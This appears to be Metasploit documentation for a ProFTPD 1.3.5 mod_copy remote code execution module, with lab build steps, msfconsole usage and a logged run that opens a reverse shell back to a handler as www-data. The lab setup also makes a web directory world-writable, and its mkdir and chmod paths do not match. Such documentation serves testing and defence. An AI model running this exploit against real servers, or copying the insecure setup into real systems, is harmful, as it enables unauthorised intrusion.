## Vulnerable Application

This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5.
Any unauthenticated client can leverage these commands to copy files from any
part of the filesystem to a chosen destination. The copy commands are executed with
the rights of the ProFTPD service, which by default runs under the privileges of the
'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
directory, PHP remote code execution is made possible.


## Installation Steps

Download and build:

```sh
sudo apt install gcc make
wget ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.5.tar.gz
tar zxvf proftpd-1.3.5.tar.gz
cd proftpd-1.3.5
./configure --with-modules=mod_copy
make
```

Run ProFTPD using the sample default configuration file (in foreground with `-n` flag for testing):

```
sudo ./proftpd -n -c "`pwd`/sample-configurations/basic.conf"
```

Set up a web server with a world-writable directory:

```
sudo apt install php apache2
sudo mkdir /home/var/www/html/test
sudo chmod 777 /var/www/html/test
```

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/unix/ftp/proftpd_modcopy_exec`
1. Do: `set rhosts <rhosts>`
1. Do: `set rport_ftp <remote ftp port>`
1. Do: `set tmppath <writable temporary file path>`
1. Do: `set sitepath <writable web server file path>`
1. Do: `run`
1. You should get a new session.

## Options

### RPORT_FTP

FTP port (default: `21`)

### TMPPATH

Absolute writable path (default: `/tmp`)

### SITEPATH

Absolute writable website path (default: `/var/www`)


## Scenarios

### ProFTPD 1.3.5 on Ubuntu 22.04

```
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.200.158
rhosts => 192.168.200.158
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > check
[*] 192.168.200.158:80 - The target appears to be vulnerable. 192.168.200.158:21 - Unauthenticated SITE CPFR command was successful
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html/test
sitepath => /var/www/html/test
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set targeturi /test
targeturi => /test
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.158:80 - 192.168.200.158:21 - Connected to FTP server
[*] 192.168.200.158:80 - 192.168.200.158:21 - Sending copy commands to FTP server
[*] 192.168.200.158:80 - Executing PHP payload /test/EbzQzU.php
[+] 192.168.200.158:80 - Deleted /var/www/html/test/EbzQzU.php
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.158:46352) at 2023-03-19 00:22:49 -0400

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/html/test
```